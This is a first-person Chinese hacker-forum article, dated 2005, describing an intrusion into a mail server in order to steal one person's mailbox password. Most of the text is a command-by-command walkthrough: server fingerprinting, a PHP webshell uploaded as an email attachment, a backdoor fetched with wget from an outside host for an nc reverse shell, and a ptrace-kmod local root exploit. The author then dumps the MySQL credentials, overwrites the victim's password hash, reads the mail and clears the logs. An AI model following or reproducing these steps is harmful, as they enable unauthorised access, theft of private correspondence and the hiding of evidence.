| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

一次渗透入侵某邮局过程（LINUX8.0）    热     ★★★ 【字体：小 大】
一次渗透入侵某邮局过程（LINUX8.0）
作者：未知    文章来源：CnXHacker.Net    点击数：    更新时间：2005-5-7
自从我承担起一个项目的负责人后，原本没有规律的生活现在更变的没有头绪了........时间的因素决定了自己无法去做一些想做的事情。但是有些时候又不得不去做一些不想做的事情。。。。。。  得到一个MAIL信箱地址，我想拿到这个信箱的密码。至于什么原因促使我必须要拿到此信箱的密码我在这里就保密。。。。。  要得到一个信箱的密码？暴力破解？枚举探测？NO！  一听暴力、枚举，我心都麻。。。。我害怕暴力、更害怕枚举：）  首先打开此信箱的登陆地址 http://mail.xxx.com.cn  简单了看了一下也没发现什么漏洞，在打开其主页http://www.xxx.com.cn  看看全都是一些HTML页面，连ASP都没有，心想这下不好办了，ASP代码漏洞，数据库插入漏洞统统派不上用场，好不容易有个论坛栏目还是空地，估计还没开。按惯例吧，看看是什么系统，心想应该是LINUX的吧，一般像邮局这些单位都比较喜欢用这类系统  ping www.xxx.com.cn  Pinging www.xxx.com.cn [61.xxx.xxx.xxx] with 32 bytes of data:  Reply from 61.xxx.xxx.xxx: bytes=32 time<60ms TTL=60  Reply from 61.xxx.xxx.xxx: bytes=32 time<60ms TTL=60  Reply from 61.xxx.xxx.xxx bytes=32 time<60ms TTL=60  Reply from 61.xxx.xxx.xxx bytes=32 time<60ms TTL=60  接着 telnet 61.xxx.xxx.xxx 80  然后Ctrl+c 中断一次然后按回车，返回下列信息  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  <HTML><HEAD>  <TITLE>501 Method  Not Implemented</TITLE>  </HEAD><BODY>  <H1>Method Not Implemented</H1>     to /index.html not supported.<P>  Invalid method in request   <P>  <HR>  <ADDRESS>Apache/1.3.12 Server at www.xxx.com.cn Port 80</A  DDRESS>  </BODY></HTML>  Connection to host lost.  看到了我想了解到的信息 Apache/1.3.12 ，WEB是用APACHE架设的，从PING值以及80返回的信息来看，判断对方的主机应该是linux系统。（此以上判断方法只是做为常用的判断手法，但不包含所有的服务器都可以用此方法判断出正确的xx作系统，有些管理员没事干的时候可以改改PING值，改改WEB返回的版本信息，那么你得到的将会是一个错误的信息了）  从WEB的整个站点来看没有什么可利用的东西，只开了80、25、110端口，没开远程TELNET管理，说不定还有_blank">防火墙。估计远程溢出等等程序都没有利用的余地了。没办法只好在回到mail.xxx.com.cn上看看，看着信箱登陆页面发呆着。。。。输入信箱用户名xxx密码：假密码（如果这时候要是碰巧输入的密码是对的那会如何？）  希望可以返回一些有用的错误信息，可见也很小气，只返回了，密码或者用户名错误，什么都没了。。。无语。。。。。。  眼睛一亮，上面这么大的图片写着免费注册，为什么不注册一个进去看看呢？正高兴的去点，怎么也点不开，还以为鼠标坏了呢。原来管理员把注册的连接地址去掉了，不允许注册。这是过分。。。  打开此页面仔细查看原代码，希望可以找到我需要的信息：（  <FORM name=login action="/mail/login.php" method=post>  <INPUT TYPE="hidden" NAME="domain" VALUE="mail.xxx.com.cn">   <TABLE height=163 cellSpacing=0 cellPadding=0 width=427   background=/images/bg.gif border=0>  <TBODY>   <TR vAlign=center>  <TD colSpan=2 height=50>  <DIV align=center><IMG height=24   src="/images/small_title.gif" width=82><BR>  </DIV>  <HR width="90%" SIZE=1>  </TD></TR>  <TR>  <TD align=right width="50%">用户名： <INPUT maxLength=15  size=15 name=name> </TD>  <TD width="50%"><IMG height=20   src="/images/r_mail.gif" width=120></TD>  </TR>  <TR>  <TD align=right width="50%">口　令： <INPUT type=password   maxLength=12 size=15 name=passwd> </TD>  <TD width="50%">　 <INPUT class=button type=submit value=进　入 name="login" onClick="Login(this.form)">  　<!--<A   href="getpw.html"><FONT   color=#669966>忘记密码</FONT></A>--></TD>  </TR>  <TR>  <INPUT TYPE="hidden" NAME="Lang" VALUE="gb">   <TD vAlign=top align=right width="50%"><INPUT   type=checkbox CHECKED name=sameip> IP安全</TD>   <TD width="50%"><!--　<A   href="/cert/index.html"><IMG   height=31 src="/images/cmd_register.gif" width=120   border=0></A>--></TD>  </TR></TBODY></TABLE></FORM></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD>  看到了mail/login.php、getpw.html与cert/index.html  第一个是验证登陆页面login.php，请求后没找到可利用漏洞，getpw.htm？难道是找回密码的页面？可惜请求此页面提示找不到该页，我想是管理员删除了吧。在接着请求cert/index.html 老天！真好，竟然是注册新用户的页面。（PS：我在想为何管理员删除了getpwd.htm为何留下了这个申请页面？难道是为了方便自己开新用户？那他用ADMIN帐号直接开用户不是更好？不解中。。。）  填好相关信息我注册了一个帐号为 test密码为test，登陆进去了高兴。。。。。。别人是不是在想就注册一个普通的信箱用户也高兴。。。。。：（  我的思路是上传一个webshell上去，然后就好办了。但是怎么上传上去呢，这个是个问题。注意有了，看到他是支持PHP的，那么APACHE的目录应该是不支持ASP的，找了个PHP的WEBSHELL。接着，邮件，发给谁？当然是发给自己了 上传wehbshell.php然后OK点发送，就自己给自己发了一封信，附件里载着我的希望。。。webshell.php，现在的思路是如何知道webshell.php的真实访问地址，凭着入侵积累的经验，不停止的对附件构造伪造的请求，终于返回了我需要的错误信息，判断一下便的到了真实的地址为  http://mail.xxx.com.cn/file/webshell.php  好了，得到一个SHELL了  uname 得到确实是linux的系统  ls -l  看一下文件  现在只是一个WEBSHELL环境，xx作起来及不舒服，还是先得到一个CMD下的SHELL好，找出一个LINUX的反向连接程序，这样用NC将会得到一个本地SHELL，那么LINUX来说本地溢出提升到ROOT权限不是更容易了。开始。。。  wget http://xxx.com/bd.c -O /tmp/door.c  把db.c传到TMP下改名为 door.c  注：只有对TMP目录里才有写的权限  gcc -o /tmp/door /tmp/door.c  把door.c编译  接着在PHP的SHELL里在输入  /tmp/door 211.xx.xxxx.xxx  要反弹连接到的机器IP（211.xxx.xxx.xxx为我的机器IP）  然后我在本机上开  nc -l -vv -p 4000  接着一会便出现了反弹成功的信息  uid 看了一下  接着提升权限到root  wget http://xxxx.xxx.xxxx/ptrace-kmod.c  下载到机器上  gcc -o ptrace-kmod ptrace-kmod.c  编译ptrace-kmod.c  运行ptrace-kmod  溢出成功，拿到了ROOT权限  ls -l  看到确定WEBMAIL的目录位置  然后进入到WEBMAIL的目录里ls -l  看到config.php文件  接着cat config.php  得到MYSQL的用户名为:root 密码为xxx  MAIL的数据库为webmail  好了，本地进行登陆MYSQL  mysql -u root -p   输入密码后进入了mysql  查看我需要的信箱用户xxx  select * from webmail where pw_name=’xxx’;  返回  ----------------------------------------------------------------  pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir  pw_shell  xxx mail.xxx.com.cn ftczP2YoArY7o 0 0 xxx /home/vp  opmail/domains/mail.xxx.com.cn/D/xxx 10485760  -------------------------------------------------------------------  看到了，我要的用户xxx的密码是 ftczP2YoArY7o，很明显是加密过的，既然加密过的，我就改他密码，然后进他的邮箱  select * from webmail where pw_name=’test’;  看我自己刚才注册的用户名信息  ----------------------------------------------------------------  pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir  pw_shell  test mail.xxx.com.cn ft6GFs8hTv26 0 0 test /home/vp  opmail/domains/mail.xxx.com.cn/D/xxx 10485760  -------------------------------------------------------------------  好了，看到我注册的test密码是ft6GFs8hTv26   update webmail;  update webmail set pw_passwd=’ft6GFs8hTv26 ’ where pw_name=’xxx’;  把用户名为xxx的密码改为test  顺便我也改了他的ADMIN和WEBMASTER的进去看一下，得到他的MAIL真的是没有管理员，难怪管理员没把那个申请的页面删除，还真是为了给自己用起来方便，呵呵。看完我所需要的信息后，在把他们的密码恢复。然后清除了日志，OK，此次入侵测试成功完成  对方的主机系统为linux 8.0的  上面用到的溢出代码，我都放在下再站的LINUX/exploits目录里，有需要的朋友可以自己去下。
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 预防旁注攻击Guests与Users要一视同仁 下一篇文章： 实战入侵新浪分站的一台服务器
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				对kappa官方网站的渗透经过 渗透冰兰黑客基地 北京网通“连续上网48小时断 内网渗透——如何打开突破口 内网渗透----如何打开突破口 网站渗透率已达85.6％ 被篡改 防护先行之在渗透测试中的攻 苹果发布QuickTime补丁 一次 黑客攻击每39秒一次 1234为最 互联网39秒发生一次黑客攻击

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.